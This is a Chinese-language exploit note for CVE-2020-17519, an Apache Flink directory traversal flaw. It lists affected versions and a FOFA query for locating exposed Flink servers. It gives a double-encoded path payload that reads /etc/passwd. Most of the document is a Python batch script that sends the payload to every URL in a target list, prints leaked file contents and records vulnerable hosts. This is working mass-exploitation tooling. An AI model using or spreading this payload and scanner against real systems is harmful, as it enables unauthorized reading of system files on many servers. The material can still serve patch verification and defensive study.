影响范围
Apache Flink 1.5.1 ~ 1.11.2
FOFA:
app="APACHE-Flink"
PoC:
/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd
批量CVE-2020-17519.py:
#!/usr/bin/env python
# coding:utf-8
# author:B1anda0
#affected versions are Apache Flink 1.11.0-1.11.2
import requests,sys,colorama
from colorama import *
init(autoreset=True)
banner='''\033[1;33;40m
_______ ________ ___ ___ ___ ___ __ ______ _____ __ ___
/ ____\ \ / / ____| |__ \ / _ \__ \ / _ \ /_ |____ | ____/_ |/ _ \
| | \ \ / /| |__ ______ ) | | | | ) | | | |______| | / /| |__ | | (_) |
| | \ \/ / | __|______/ /| | | |/ /| | | |______| | / / |___ \ | |\__, |
| |____ \ / | |____ / /_| |_| / /_| |_| | | | / / ___) || | / /
\_____| \/ |______| |____|\___/____|\___/ |_|/_/ |____/ |_| /_/
'''
def verify():
headers = {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.99 Safari/537.36"}
payload= '/jobmanager/logs/..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252fetc%252fpasswd'
poc=urls+payload
try:
requests.packages.urllib3.disable_warnings()#解决InsecureRequestWarning警告
response=requests.get(poc,headers=headers,timeout=15,verify=False)
if response.status_code==200 and "root:x" in response.content:
print(u'\033[1;31;40m[+]{} is apache flink directory traversal vulnerability'.format(urls))
print(response.content)
#将漏洞地址输出在Vul.txt中
f=open('./vul.txt','a')
f.write(urls)
f.write('\n')
else:
print('\033[1;32;40m[-]{} None'.format(urls))
except:
print('{} request timeout'.format(urls))
if __name__ == '__main__':
print (banner)
if len(sys.argv)!=2:
print('Example:python CVE-2020-17519.py urls.txt')
else:
file = open(sys.argv[1])
for url in file.readlines():
urls=url.strip()
if urls[-1]=='/':
urls=urls[:-1]
verify()
print ('Check Over')ref:
https://help.aliyun.com/noticelist/articleid/1060777426.html
https://github.com/vulhub/vulhub/tree/master/flink/CVE-2020-17519